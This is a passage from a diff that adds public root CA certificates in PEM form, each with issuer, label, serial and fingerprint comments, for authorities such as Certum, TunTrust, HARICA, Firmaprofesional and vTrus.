+H1bDOZ8rbeTzPvY1ZNoMHKGESy9LS+IsJJ1tk0DrtSOOMspvRdOoiXsezx76W0OL +zc2oD2rKDF65nkeP8Nm2CgtYZRczuSPkdxl9y0oukntPLxB3sY0vaJxizOBQ+OyR +p1RMVwnVdmPF6GUe7m1qzwmd+nxPrWAI/VaZDxUse6mAq4xhj0oHdkLePfTdsiQz +W7i1o0TJrH93PB0j7IKppuLIBkwC/qxcmZkLLxCKpvR/1Yd0DVlJRfbwcVw5Kda/ +SiOL9V8BY9KHcyi1Swr1+KuCLH5zJTIdC2MKF4EA/7Z2Xue0sUDKIbvVgFHlSFJn +LNJhiQcND85Cd8BEc5xEUKDbEAotlRyBr+Qc5RQe8TZBAQIvfXOn3kLMTOmJDVb3 +n5HUA8ZsyY/b2BzgQJhdZpmYgG4t/wHFzstGH6wCxkPmrqKEPMVOHj1tyRRM4y5B +u8o5vzY8KhmqQYdOpc5LMnndkEl/AgMBAAGjYzBhMB8GA1UdIwQYMBaAFJxf0Gxj +o1+TypOYCK2Mh6UsXME3MB0GA1UdDgQWBBScX9BsY6Nfk8qTmAitjIelLFzBNzAO +BgNVHQ8BAf8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsFAAOC +AgEATh65isagmD9uw2nAalxJUqzLK114OMHVVISfk/CHGT0sZonrDUL8zPB1hT+L +9IBdeeUXZ701guLyPI59WzbLWoAAKfLOKyzxj6ptBZNscsdW699QIyjlRRA96Gej +rw5VD5AJYu9LWaL2U/HANeQvwSS9eS9OICI7/RogsKQOLHDtdD+4E5UGUcjohybK +pFtqFiGS3XNgnhAY3jyB6ugYw3yJ8otQPr0R4hUDqDZ9MwFsSBXXiJCZBMXM5gf0 +vPSQ7RPi6ovDj6MzD8EpTBNO2hVWcXNyglD2mjN8orGoGjR0ZVzO0eurU+AagNjq +OknkJjCb5RyKqKkVMoaZkgoQI1YS4PbOTOK7vtuNknMBZi9iPrJyJ0U27U1W45eZ +/zo1PqVUSlJZS2Db7v54EX9K3BR5YLZrZAPbFYPhor72I5dQ8AkzNqdxliXzuUJ9 +2zg/LFis6ELhDtjTO0wugumDLmsx2d1Hhk9tl5EuT+IocTUW0fJz/iUrB0ckYyfI ++PbZa/wSMVYIwFNCr5zQM378BvAxRAMU8Vjq8moNqRGyg77FGr8H6lnco4g175x2 +MjxNBiLOFeXdntiP2t7SxDnlF4HPOEfrf4htWRvfn0IUrn7PqLBmZdo3r5+qPeoo +tt7VMVgWglvquxl1AnMaykgaIZOQCo6ThKd9OyMYkomgjaw= +-----END CERTIFICATE----- + +# Issuer: CN=Certum EC-384 CA O=Asseco Data Systems S.A. OU=Certum Certification Authority +# Subject: CN=Certum EC-384 CA O=Asseco Data Systems S.A. OU=Certum Certification Authority +# Label: "Certum EC-384 CA" +# Serial: 160250656287871593594747141429395092468 +# MD5 Fingerprint: b6:65:b3:96:60:97:12:a1:ec:4e:e1:3d:a3:c6:c9:f1 +# SHA1 Fingerprint: f3:3e:78:3c:ac:df:f4:a2:cc:ac:67:55:69:56:d7:e5:16:3c:e1:ed +# SHA256 Fingerprint: 6b:32:80:85:62:53:18:aa:50:d1:73:c9:8d:8b:da:09:d5:7e:27:41:3d:11:4c:f7:87:a0:f5:d0:6c:03:0c:f6 +-----BEGIN CERTIFICATE----- +MIICZTCCAeugAwIBAgIQeI8nXIESUiClBNAt3bpz9DAKBggqhkjOPQQDAzB0MQsw +CQYDVQQGEwJQTDEhMB8GA1UEChMYQXNzZWNvIERhdGEgU3lzdGVtcyBTLkEuMScw +JQYDVQQLEx5DZXJ0dW0gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkxGTAXBgNVBAMT +EENlcnR1bSBFQy0zODQgQ0EwHhcNMTgwMzI2MDcyNDU0WhcNNDMwMzI2MDcyNDU0 +WjB0MQswCQYDVQQGEwJQTDEhMB8GA1UEChMYQXNzZWNvIERhdGEgU3lzdGVtcyBT +LkEuMScwJQYDVQQLEx5DZXJ0dW0gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkxGTAX +BgNVBAMTEENlcnR1bSBFQy0zODQgQ0EwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAATE +KI6rGFtqvm5kN2PkzeyrOvfMobgOgknXhimfoZTy42B4mIF4Bk3y7JoOV2CDn7Tm +Fy8as10CW4kjPMIRBSqniBMY81CE1700LCeJVf/OTOffph8oxPBUw7l8t1Ot68Kj +QjBAMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFI0GZnQkdjrzife81r1HfS+8 +EF9LMA4GA1UdDwEB/wQEAwIBBjAKBggqhkjOPQQDAwNoADBlAjADVS2m5hjEfO/J +UG7BJw+ch69u1RsIGL2SKcHvlJF40jocVYli5RsJHrpka/F2tNQCMQC0QoSZ/6vn +nvuRlydd3LBbMHHOXjgaatkl5+r3YZJW+OraNsKHZZYuciUvf9/DE8k= +-----END CERTIFICATE----- + +# Issuer: CN=Certum Trusted Root CA O=Asseco Data Systems S.A. OU=Certum Certification Authority +# Subject: CN=Certum Trusted Root CA O=Asseco Data Systems S.A. OU=Certum Certification Authority +# Label: "Certum Trusted Root CA" +# Serial: 40870380103424195783807378461123655149 +# MD5 Fingerprint: 51:e1:c2:e7:fe:4c:84:af:59:0e:2f:f4:54:6f:ea:29 +# SHA1 Fingerprint: c8:83:44:c0:18:ae:9f:cc:f1:87:b7:8f:22:d1:c5:d7:45:84:ba:e5 +# SHA256 Fingerprint: fe:76:96:57:38:55:77:3e:37:a9:5e:7a:d4:d9:cc:96:c3:01:57:c1:5d:31:76:5b:a9:b1:57:04:e1:ae:78:fd +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE----- + +# Issuer: CN=TunTrust Root CA O=Agence Nationale de Certification Electronique +# Subject: CN=TunTrust Root CA O=Agence Nationale de Certification Electronique +# Label: "TunTrust Root CA" +# Serial: 108534058042236574382096126452369648152337120275 +# MD5 Fingerprint: 85:13:b9:90:5b:36:5c:b6:5e:b8:5a:f8:e0:31:57:b4 +# SHA1 Fingerprint: cf:e9:70:84:0f:e0:73:0f:9d:f6:0c:7f:2c:4b:ee:20:46:34:9c:bb +# SHA256 Fingerprint: 2e:44:10:2a:b5:8c:b8:54:19:45:1c:8e:19:d9:ac:f3:66:2c:af:bc:61:4b:6a:53:96:0a:30:f7:d0:e2:eb:41 +-----BEGIN CERTIFICATE----- +MIIFszCCA5ugAwIBAgIUEwLV4kBMkkaGFmddtLu7sms+/BMwDQYJKoZIhvcNAQEL +BQAwYTELMAkGA1UEBhMCVE4xNzA1BgNVBAoMLkFnZW5jZSBOYXRpb25hbGUgZGUg +Q2VydGlmaWNhdGlvbiBFbGVjdHJvbmlxdWUxGTAXBgNVBAMMEFR1blRydXN0IFJv +b3QgQ0EwHhcNMTkwNDI2MDg1NzU2WhcNNDQwNDI2MDg1NzU2WjBhMQswCQYDVQQG +EwJUTjE3MDUGA1UECgwuQWdlbmNlIE5hdGlvbmFsZSBkZSBDZXJ0aWZpY2F0aW9u +IEVsZWN0cm9uaXF1ZTEZMBcGA1UEAwwQVHVuVHJ1c3QgUm9vdCBDQTCCAiIwDQYJ +KoZIhvcNAQEBBQADggIPADCCAgoCggIBAMPN0/y9BFPdDCA61YguBUtB9YOCfvdZ +n56eY+hz2vYGqU8ftPkLHzmMmiDQfgbU7DTZhrx1W4eI8NLZ1KMKsmwb60ksPqxd +2JQDoOw05TDENX37Jk0bbjBU2PWARZw5rZzJJQRNmpA+TkBuimvNKWfGzC3gdOgF +VwpIUPp6Q9p+7FuaDmJ2/uqdHYVy7BG7NegfJ7/Boce7SBbdVtfMTqDhuazb1YMZ +GoXRlJfXyqNlC/M4+QKu3fZnz8k/9YosRxqZbwUN/dAdgjH8KcwAWJeRTIAAHDOF +li/LQcKLEITDCSSJH7UP2dl3RxiSlGBcx5kDPP73lad9UKGAwqmDrViWVSHbhlnU +r8a83YFuB9tgYv7sEG7aaAH0gxupPqJbI9dkxt/con3YS7qC0lH4Zr8GRuR5KiY2 +eY8fTpkdso8MDhz/yV3A/ZAQprE38806JG60hZC/gLkMjNWb1sjxVj8agIl6qeIb +MlEsPvLfe/ZdeikZjuXIvTZxi11Mwh0/rViizz1wTaZQmCXcI/m4WEEIcb9PuISg +jwBUFfyRbVinljvrS5YnzWuioYasDXxU5mZMZl+QviGaAkYt5IPCgLnPSz7ofzwB +7I9ezX/SKEIBlYrilz0QIX32nRzFNKHsLA4KUiwSVXAkPcvCFDVDXSdOvsC9qnyW +5/yeYa1E0wCXAgMBAAGjYzBhMB0GA1UdDgQWBBQGmpsfU33x9aTI04Y+oXNZtPdE +ITAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFAaamx9TffH1pMjThj6hc1m0 +90QhMA4GA1UdDwEB/wQEAwIBBjANBgkqhkiG9w0BAQsFAAOCAgEAqgVutt0Vyb+z +xiD2BkewhpMl0425yAA/l/VSJ4hxyXT968pk21vvHl26v9Hr7lxpuhbI87mP0zYu +QEkHDVneixCwSQXi/5E/S7fdAo74gShczNxtr18UnH1YeA32gAm56Q6XKRm4t+v4 +FstVEuTGfbvE7Pi1HE4+Z7/FXxttbUcoqgRYYdZ2vyJ/0Adqp2RT8JeNnYA/u8EH +22Wv5psymsNUk8QcCMNE+3tjEUPRahphanltkE8pjkcFwRJpadbGNjHh/PqAulxP +xOu3Mqz4dWEX1xAZufHSCe96Qp1bWgvUxpVOKs7/B9dPfhgGiPEZtdmYu65xxBzn +dFlY7wyJz4sfdZMaBBSSSFCp61cpABbjNhzI+L/wM9VBD8TMPN3pM0MBkRArHtG5 +Xc0yGYuPjCB31yLEQtyEFpslbei0VXF/sHyz03FJuc9SpAQ/3D2gu68zngowYI7b +nV2UqL1g52KAdoGDDIzMMEZJ4gzSqK/rYXHv5yJiqfdcZGyfFoxnNidF9Ql7v/YQ +CvGwjVRDjAS6oz/v4jXH+XTgbzRB0L9zZVcg+ZtnemZoJE6AZb0QmQZZ8mWvuMZH +u/2QeItBcy6vVR/cO5JyboTT0GFMDcx2V+IthSIVNg3rAZ3r2OvEhJn7wAzMMujj +d9qDRIueVSjAi1jTkD5OGwDxFa2DK5o= +-----END CERTIFICATE----- + +# Issuer: CN=HARICA TLS RSA Root CA 2021 O=Hellenic Academic and Research Institutions CA +# Subject: CN=HARICA TLS RSA Root CA 2021 O=Hellenic Academic and Research Institutions CA +# Label: "HARICA TLS RSA Root CA 2021" +# Serial: 76817823531813593706434026085292783742 +# MD5 Fingerprint: 65:47:9b:58:86:dd:2c:f0:fc:a2:84:1f:1e:96:c4:91 +# SHA1 Fingerprint: 02:2d:05:82:fa:88:ce:14:0c:06:79:de:7f:14:10:e9:45:d7:a5:6d +# SHA256 Fingerprint: d9:5d:0e:8e:da:79:52:5b:f9:be:b1:1b:14:d2:10:0d:32:94:98:5f:0c:62:d9:fa:bd:9c:d9:99:ec:cb:7b:1d +-----BEGIN CERTIFICATE----- +MIIFpDCCA4ygAwIBAgIQOcqTHO9D88aOk8f0ZIk4fjANBgkqhkiG9w0BAQsFADBs +MQswCQYDVQQGEwJHUjE3MDUGA1UECgwuSGVsbGVuaWMgQWNhZGVtaWMgYW5kIFJl +c2VhcmNoIEluc3RpdHV0aW9ucyBDQTEkMCIGA1UEAwwbSEFSSUNBIFRMUyBSU0Eg +Um9vdCBDQSAyMDIxMB4XDTIxMDIxOTEwNTUzOFoXDTQ1MDIxMzEwNTUzN1owbDEL +MAkGA1UEBhMCR1IxNzA1BgNVBAoMLkhlbGxlbmljIEFjYWRlbWljIGFuZCBSZXNl +YXJjaCBJbnN0aXR1dGlvbnMgQ0ExJDAiBgNVBAMMG0hBUklDQSBUTFMgUlNBIFJv +b3QgQ0EgMjAyMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIvC569l +mwVnlskNJLnQDmT8zuIkGCyEf3dRywQRNrhe7Wlxp57kJQmXZ8FHws+RFjZiPTgE +4VGC/6zStGndLuwRo0Xua2s7TL+MjaQenRG56Tj5eg4MmOIjHdFOY9TnuEFE+2uv +a9of08WRiFukiZLRgeaMOVig1mlDqa2YUlhu2wr7a89o+uOkXjpFc5gH6l8Cct4M +pbOfrqkdtx2z/IpZ525yZa31MJQjB/OCFks1mJxTuy/K5FrZx40d/JiZ+yykgmvw +Kh+OC19xXFyuQnspiYHLA6OZyoieC0AJQTPb5lh6/a6ZcMBaD9YThnEvdmn8kN3b +LW7R8pv1GmuebxWMevBLKKAiOIAkbDakO/IwkfN4E8/BPzWr8R0RI7VDIp4BkrcY +AuUR0YLbFQDMYTfBKnya4dC6s1BG7oKsnTH4+yPiAwBIcKMJJnkVU2DzOFytOOqB +AGMUuTNe3QvboEUHGjMJ+E20pwKmafTCWQWIZYVWrkvL4N48fS0ayOn7H6NhStYq +E613TBoYm5EPWNgGVMWX+Ko/IIqmhaZ39qb8HOLubpQzKoNQhArlT4b4UEV4AIHr +W2jjJo3Me1xR9BQsQL4aYB16cmEdH2MtiKrOokWQCPxrvrNQKlr9qEgYRtaQQJKQ +CoReaDH46+0N0x3GfZkYVVYnZS6NRcUk7M7jAgMBAAGjQjBAMA8GA1UdEwEB/wQF +MAMBAf8wHQYDVR0OBBYEFApII6ZgpJIKM+qTW8VX6iVNvRLuMA4GA1UdDwEB/wQE +AwIBhjANBgkqhkiG9w0BAQsFAAOCAgEAPpBIqm5iFSVmewzVjIuJndftTgfvnNAU +X15QvWiWkKQUEapobQk1OUAJ2vQJLDSle1mESSmXdMgHHkdt8s4cUCbjnj1AUz/3 +f5Z2EMVGpdAgS1D0NTsY9FVqQRtHBmg8uwkIYtlfVUKqrFOFrJVWNlar5AWMxaja +H6NpvVMPxP/cyuN+8kyIhkdGGvMA9YCRotxDQpSbIPDRzbLrLFPCU3hKTwSUQZqP +JzLB5UkZv/HywouoCjkxKLR9YjYsTewfM7Z+d21+UPCfDtcRj88YxeMn/ibvBZ3P +zzfF0HvaO7AWhAw6k9a+F9sPPg4ZeAnHqQJyIkv3N3a6dcSFA1pj1bF1BcK5vZSt +jBWZp5N99sXzqnTPBIWUmAD04vnKJGW/4GKvyMX6ssmeVkjaef2WdhW+o45WxLM0 +/L5H9MG0qPzVMIho7suuyWPEdr6sOBjhXlzPrjoiUevRi7PzKzMHVIf6tLITe7pT +BGIBnfHAT+7hOtSLIBD6Alfm78ELt5BGnBkpjNxvoEppaZS3JGWg/6w/zgH7IS79 +aPib8qXPMThcFarmlwDB31qlpzmq6YR/PFGoOtmUW4y/Twhx5duoXNTSpv4Ao8YW +xw/ogM4cKGR0GQjTQuPOAF1/sdwTsOEFy9EgqoZ0njnnkf3/W9b3raYvAwtt41dU +63ZTGI0RmLo= +-----END CERTIFICATE----- + +# Issuer: CN=HARICA TLS ECC Root CA 2021 O=Hellenic Academic and Research Institutions CA +# Subject: CN=HARICA TLS ECC Root CA 2021 O=Hellenic Academic and Research Institutions CA +# Label: "HARICA TLS ECC Root CA 2021" +# Serial: 137515985548005187474074462014555733966 +# MD5 Fingerprint: ae:f7:4c:e5:66:35:d1:b7:9b:8c:22:93:74:d3:4b:b0 +# SHA1 Fingerprint: bc:b0:c1:9d:e9:98:92:70:19:38:57:e9:8d:a7:b4:5d:6e:ee:01:48 +# SHA256 Fingerprint: 3f:99:cc:47:4a:cf:ce:4d:fe:d5:87:94:66:5e:47:8d:15:47:73:9f:2e:78:0f:1b:b4:ca:9b:13:30:97:d4:01 +-----BEGIN CERTIFICATE----- +MIICVDCCAdugAwIBAgIQZ3SdjXfYO2rbIvT/WeK/zjAKBggqhkjOPQQDAzBsMQsw +CQYDVQQGEwJHUjE3MDUGA1UECgwuSGVsbGVuaWMgQWNhZGVtaWMgYW5kIFJlc2Vh +cmNoIEluc3RpdHV0aW9ucyBDQTEkMCIGA1UEAwwbSEFSSUNBIFRMUyBFQ0MgUm9v +dCBDQSAyMDIxMB4XDTIxMDIxOTExMDExMFoXDTQ1MDIxMzExMDEwOVowbDELMAkG +A1UEBhMCR1IxNzA1BgNVBAoMLkhlbGxlbmljIEFjYWRlbWljIGFuZCBSZXNlYXJj +aCBJbnN0aXR1dGlvbnMgQ0ExJDAiBgNVBAMMG0hBUklDQSBUTFMgRUNDIFJvb3Qg +Q0EgMjAyMTB2MBAGByqGSM49AgEGBSuBBAAiA2IABDgI/rGgltJ6rK9JOtDA4MM7 +KKrxcm1lAEeIhPyaJmuqS7psBAqIXhfyVYf8MLA04jRYVxqEU+kw2anylnTDUR9Y +STHMmE5gEYd103KUkE+bECUqqHgtvpBBWJAVcqeht6NCMEAwDwYDVR0TAQH/BAUw +AwEB/zAdBgNVHQ4EFgQUyRtTgRL+BNUW0aq8mm+3oJUZbsowDgYDVR0PAQH/BAQD +AgGGMAoGCCqGSM49BAMDA2cAMGQCMBHervjcToiwqfAircJRQO9gcS3ujwLEXQNw +SaSS6sUUiHCm0w2wqsosQJz76YJumgIwK0eaB8bRwoF8yguWGEEbo/QwCZ61IygN +nxS2PFOiTAZpffpskcYqSUXm7LcT4Tps +-----END CERTIFICATE----- + +# Issuer: CN=Autoridad de Certificacion Firmaprofesional CIF A62634068 +# Subject: CN=Autoridad de Certificacion Firmaprofesional CIF A62634068 +# Label: "Autoridad de Certificacion Firmaprofesional CIF A62634068" +# Serial: 1977337328857672817 +# MD5 Fingerprint: 4e:6e:9b:54:4c:ca:b7:fa:48:e4:90:b1:15:4b:1c:a3 +# SHA1 Fingerprint: 0b:be:c2:27:22:49:cb:39:aa:db:35:5c:53:e3:8c:ae:78:ff:b6:fe +# SHA256 Fingerprint: 57:de:05:83:ef:d2:b2:6e:03:61:da:99:da:9d:f4:64:8d:ef:7e:e8:44:1c:3b:72:8a:fa:9b:cd:e0:f9:b2:6a +-----BEGIN CERTIFICATE----- +MIIGFDCCA/ygAwIBAgIIG3Dp0v+ubHEwDQYJKoZIhvcNAQELBQAwUTELMAkGA1UE +BhMCRVMxQjBABgNVBAMMOUF1dG9yaWRhZCBkZSBDZXJ0aWZpY2FjaW9uIEZpcm1h +cHJvZmVzaW9uYWwgQ0lGIEE2MjYzNDA2ODAeFw0xNDA5MjMxNTIyMDdaFw0zNjA1 +MDUxNTIyMDdaMFExCzAJBgNVBAYTAkVTMUIwQAYDVQQDDDlBdXRvcmlkYWQgZGUg +Q2VydGlmaWNhY2lvbiBGaXJtYXByb2Zlc2lvbmFsIENJRiBBNjI2MzQwNjgwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDKlmuO6vj78aI14H9M2uDDUtd9 +thDIAl6zQyrET2qyyhxdKJp4ERppWVevtSBC5IsP5t9bpgOSL/UR5GLXMnE42QQM +cas9UX4PB99jBVzpv5RvwSmCwLTaUbDBPLutN0pcyvFLNg4kq7/DhHf9qFD0sefG +L9ItWY16Ck6WaVICqjaY7Pz6FIMMNx/Jkjd/14Et5cS54D40/mf0PmbR0/RAz15i +NA9wBj4gGFrO93IbJWyTdBSTo3OxDqqHECNZXyAFGUftaI6SEspd/NYrspI8IM/h +X68gvqB2f3bl7BqGYTM+53u0P6APjqK5am+5hyZvQWyIplD9amML9ZMWGxmPsu2b +m8mQ9QEM3xk9Dz44I8kvjwzRAv4bVdZO0I08r0+k8/6vKtMFnXkIoctXMbScyJCy +Z/QYFpM6/EfY0XiWMR+6KwxfXZmtY4laJCB22N/9q06mIqqdXuYnin1oKaPnirja +EbsXLZmdEyRG98Xi2J+Of8ePdG1asuhy9azuJBCtLxTa/y2aRnFHvkLfuwHb9H/T +KI8xWVvTyQKmtFLKbpf7Q8UIJm+K9Lv9nyiqDdVF8xM6HdjAeI9BZzwelGSuewvF +6NkBiDkal4ZkQdU7hwxu+g/GvUgUvzlN1J5Bto+WHWOWk9mVBngxaJ43BjuAiUVh +OSPHG0SjFeUc+JIwuwIDAQABo4HvMIHsMB0GA1UdDgQWBBRlzeurNR4APn7VdMAc +tHNHDhpkLzASBgNVHRMBAf8ECDAGAQH/AgEBMIGmBgNVHSAEgZ4wgZswgZgGBFUd +IAAwgY8wLwYIKwYBBQUHAgEWI2h0dHA6Ly93d3cuZmlybWFwcm9mZXNpb25hbC5j +b20vY3BzMFwGCCsGAQUFBwICMFAeTgBQAGEAcwBlAG8AIABkAGUAIABsAGEAIABC +AG8AbgBhAG4AbwB2AGEAIAA0ADcAIABCAGEAcgBjAGUAbABvAG4AYQAgADAAOAAw +ADEANzAOBgNVHQ8BAf8EBAMCAQYwDQYJKoZIhvcNAQELBQADggIBAHSHKAIrdx9m +iWTtj3QuRhy7qPj4Cx2Dtjqn6EWKB7fgPiDL4QjbEwj4KKE1soCzC1HA01aajTNF +Sa9J8OA9B3pFE1r/yJfY0xgsfZb43aJlQ3CTkBW6kN/oGbDbLIpgD7dvlAceHabJ +hfa9NPhAeGIQcDq+fUs5gakQ1JZBu/hfHAsdCPKxsIl68veg4MSPi3i1O1ilI45P +Vf42O+AMt8oqMEEgtIDNrvx2ZnOorm7hfNoD6JQg5iKj0B+QXSBTFCZX2lSX3xZE +EAEeiGaPcjiT3SC3NL7X8e5jjkd5KAb881lFJWAiMxujX6i6KtoaPc1A6ozuBRWV +1aUsIC+nmCjuRfzxuIgALI9C2lHVnOUTaHFFQ4ueCyE8S1wF3BqfmI7avSKecs2t +CsvMo2ebKHTEm9caPARYpoKdrcd7b/+Alun4jWq9GJAd/0kakFI3ky88Al2CdgtR +5xbHV/g4+afNmyJU72OwFW1TZQNKXkqgsqeOSQBZONXH9IBk9W6VULgRfhVwOEqw +f9DEMnDAGf/JOC0ULGb0QkTmVXYbgBVX/8Cnp6o5qtjTcNAuuuuUavpfNIbnYrX9 +ivAwhZTJryQCL2/W3Wf+47BVTwSYT6RBVuKT0Gro1vP7ZeDOdcQxWQzugsgMYDNK +GbqEZycPvEJdvSRUDewdcAZfpLz6IHxV +-----END CERTIFICATE----- + +# Issuer: CN=vTrus ECC Root CA O=iTrusChina Co.,Ltd. +# Subject: CN=vTrus ECC Root CA O=iTrusChina Co.,Ltd. +# Label: "vTrus ECC Root CA" +# Serial: 630369271402956006249506845124680065938238527194 +# MD5 Fingerprint: de:4b:c1:f5:52:8c:9b:43:e1:3e:8f:55:54:17:8d:85 +# SHA1 Fingerprint: f6:9c:db:b0:fc:f6:02:13:b6:52:32:a6:a3:91:3f:16:70:da:c3:e1 +# SHA256 Fingerprint: 30:fb:ba:2c:32:23:8e:2a:98:54:7a:f9:79:31:e5:50:42:8b:9b:3f:1c:8e:eb:66:33:dc:fa:86:c5:b2:7d:d3 +-----BEGIN CERTIFICATE----- +MIICDzCCAZWgAwIBAgIUbmq8WapTvpg5Z6LSa6Q75m0c1towCgYIKoZIzj0EAwMw +RzELMAkGA1UEBhMCQ04xHDAaBgNVBAoTE2lUcnVzQ2hpbmEgQ28uLEx0ZC4xGjAY +BgNVBAMTEXZUcnVzIEVDQyBSb290IENBMB4XDTE4MDczMTA3MjY0NFoXDTQzMDcz +MTA3MjY0NFowRzELMAkGA1UEBhMCQ04xHDAaBgNVBAoTE2lUcnVzQ2hpbmEgQ28u +LEx0ZC4xGjAYBgNVBAMTEXZUcnVzIEVDQyBSb290IENBMHYwEAYHKoZIzj0CAQYF +K4EEACIDYgAEZVBKrox5lkqqHAjDo6LN/llWQXf9JpRCux3NCNtzslt188+cToL0 +v/hhJoVs1oVbcnDS/dtitN9Ti72xRFhiQgnH+n9bEOf+QP3A2MMrMudwpremIFUd +e4BdS49nTPEQo0IwQDAdBgNVHQ4EFgQUmDnNvtiyjPeyq+GtJK97fKHbH88wDwYD +VR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwCgYIKoZIzj0EAwMDaAAwZQIw +V53dVvHH4+m4SVBrm2nDb+zDfSXkV5UTQJtS0zvzQBm8JsctBp61ezaf9SXUY2sA +AjEA6dPGnlaaKsyh2j/IZivTWJwghfqrkYpwcBE4YGQLYgmRWAD5Tfs0aNoJrSEG +GJTO +-----END CERTIFICATE----- + +# Issuer: CN=vTrus Root CA O=iTrusChina Co.,Ltd. +# Subject: CN=vTrus Root CA O=iTrusChina Co.,Ltd. +# Label: "vTrus Root CA" +# Serial: 387574501246983434957692974888460947164905180485 +# MD5 Fingerprint: b8:c9:37:df:fa:6b:31:84:64:c5:ea:11:6a:1b:75:fc +# SHA1 Fingerprint: 84:1a:69:fb:f5:cd:1a:25:34:13:3d:e3:f8:fc:b8:99:d0:c9:14:b7 +# SHA256 Fingerprint: 8a:71:de:65:59:33:6f:42:6c:26:e5:38:80:d0:0d:88:a1:8d:a4:c6:a9:1f:0d:cb:61:94:e2:06:c5:c9:63:87 +-----BEGIN CERTIFICATE----- +MIIFVjCCAz6gAwIBAgIUQ+NxE9izWRRdt86M/TX9b7wFjUUwDQYJKoZIhvcNAQEL +BQAwQzELMAkGA1UEBhMCQ04xHDAaBgNVBAoTE2lUcnVzQ2hpbmEgQ28uLEx0ZC4x +FjAUBgNVBAMTDXZUcnVzIFJvb3QgQ0EwHhcNMTgwNzMxMDcyNDA1WhcNNDMwNzMx +MDcyNDA1WjBDMQswCQYDVQQGEwJDTjEcMBoGA1UEChMTaVRydXNDaGluYSBDby4s +THRkLjEWMBQGA1UEAxMNdlRydXMgUm9vdCBDQTCCAiIwDQYJKoZIhvcNAQEBBQAD +ggIPADCCAgoCggIBAL1VfGHTuB0EYgWgrmy3cLRB6ksDXhA/kFocizuwZotsSKYc +IrrVQJLuM7IjWcmOvFjai57QGfIvWcaMY1q6n6MLsLOaXLoRuBLpDLvPbmyAhykU +AyyNJJrIZIO1aqwTLDPxn9wsYTwaP3BVm60AUn/PBLn+NvqcwBauYv6WTEN+VRS+ +GrPSbcKvdmaVayqwlHeFXgQPYh1jdfdr58tbmnDsPmcF8P4HCIDPKNsFxhQnL4Z9 +8Cfe/+Z+M0jnCx5Y0ScrUw5XSmXX+6KAYPxMvDVTAWqXcoKv8R1w6Jz1717CbMdH 